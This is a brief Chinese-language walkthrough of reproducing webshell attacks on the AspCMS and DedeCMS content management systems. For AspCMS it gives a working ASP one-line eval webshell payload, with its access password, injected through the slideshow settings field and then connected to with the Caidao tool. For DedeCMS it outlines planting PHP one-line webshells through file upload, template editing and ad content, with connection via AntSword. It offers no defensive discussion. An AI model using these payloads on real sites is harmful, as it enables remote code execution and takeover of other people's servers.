dedecms(四种webshell姿势)、aspcms webshell漏洞复现
一、aspcms webshell
1、登陆后台,在扩展功能的幻灯片设置模块,点击保存进行抓包查看
2、在slideTextStatus写入asp一句话木马
1%25><%25Eval(Request(chr(65)))%25><%25 密码是a,放行,修改成功
3、使用菜刀工具连接查看
二、dedecms webshell
1、在附件管理上传文件可以上传一句话木马php文件
2、在模板管理的index.php文件中写入phpinfo()查看
3、在广告管理,添加广告内容出添加一句话木马,使用蚁剑连接查看